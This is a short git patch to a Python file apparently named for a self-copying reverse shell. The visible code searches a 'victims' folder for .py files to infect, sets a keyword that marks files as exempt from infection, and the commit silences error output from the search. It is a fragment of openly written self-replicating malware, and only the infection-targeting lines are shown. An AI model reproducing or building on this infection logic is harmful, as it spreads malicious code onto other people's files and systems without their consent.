From c8a80f468181a91771aa167160ed7d187e35dfc1 Mon Sep 17 00:00:00 2001 From: id101010 Date: Fri, 11 Oct 2019 14:24:44 +0200 Subject: [PATCH] DO NOT PRINT ERRORS --- self_copy_rshell.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/self_copy_rshell.py b/self_copy_rshell.py index ea27c04..defae51 100644 --- a/self_copy_rshell.py +++ b/self_copy_rshell.py @@ -6,7 +6,7 @@ import string #!x # search command, adjust to your needs #cmd = 'find / -name "*.py" -print' #!x -cmd = 'find ./victims -name "*.py" -print' #!x +cmd = 'find ./victims -name "*.py" -print 2>/dev/null' #!x # keyword which prevents file from getting infected keyword = 'plsdontinjectme' #!x